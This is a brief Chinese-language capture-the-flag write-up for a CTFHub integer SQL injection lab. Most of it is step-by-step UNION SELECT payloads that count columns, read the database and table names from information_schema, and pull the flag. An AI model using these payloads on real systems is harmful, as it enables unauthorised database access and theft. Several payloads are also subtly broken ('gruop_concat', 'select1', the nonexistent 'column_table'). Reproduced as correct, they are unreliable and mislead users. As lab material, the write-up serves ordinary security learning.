SQL整型注入
-
根据提示进行
输入1
可得到该行数据为ctfhub -
然后输入2 ,3 ,发现在输入数字中只有1,2回显,3不回显
证明数据只有两行 -
之后观察该数据的列数情况
输入1 order by 2
1 order by 3
由此可以判断出该数据中只有两列 -
由上述可知,该数据为两行两列,我们继续查询库名
-1 union select1,database()
数据库名为sqli
- 接下来查询数据库中数据表的名称
-1 union select 1,gruop_concat(table_name)from information_schema.tables where table_schema=‘sqli’
我们能知道sqli的数据库中的数据表名称分别为:news,flag
- 然后去查flag列的所有字段名
-1 union select 1,group_concat(column_table) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’
- 然后直接在该库的表的列中查询flag
-1 union select 1,group_concat(flag) from sqli.flag
得出flag